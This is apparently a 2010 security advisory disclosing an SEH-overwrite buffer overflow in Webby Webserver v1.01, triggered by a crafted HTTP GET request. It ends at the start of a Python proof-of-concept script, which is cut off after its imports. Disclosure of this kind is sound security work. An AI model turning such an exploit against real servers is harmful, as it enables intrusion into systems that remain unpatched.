|
---------------------------------------------=0D
=0D
Webby Webserver v1.01=0D
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)=0D
Date: 25.05.2010=0D
=0D
---------------------------------------------=0D
=0D
- Description=0D
=0D
Webby is a small webserver for the windows operating system.=0D
=0D
- buffer overflow vulnerability=0D
=0D
The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs.=0D
=0D
- Solution=0D
=0D
No known solution available.=0D
No contact details of the author found.=0D
=0D
- Credits=0D
=0D
The vulnerability was discovered by Michael Messner from Integralis=0D
michael#dot#messner#at#integralis#dot#com=0D
=0D
- Timeline=0D
=0D
25.05.2010 - Vulnerability discovered=0D
=0D
- Reference=0D
=0D
Download vulnerable software=0D
http://www.shareware.de/webby-webserver/=0D
=0D
- POC=0D
=0D
#!/usr/bin/python=0D
=0D
import socket=0D
import sys=0D
import os.path=0D
import time=0D
=0D
if len(sys.argv) < 2:=0D
print "Usage: webby.py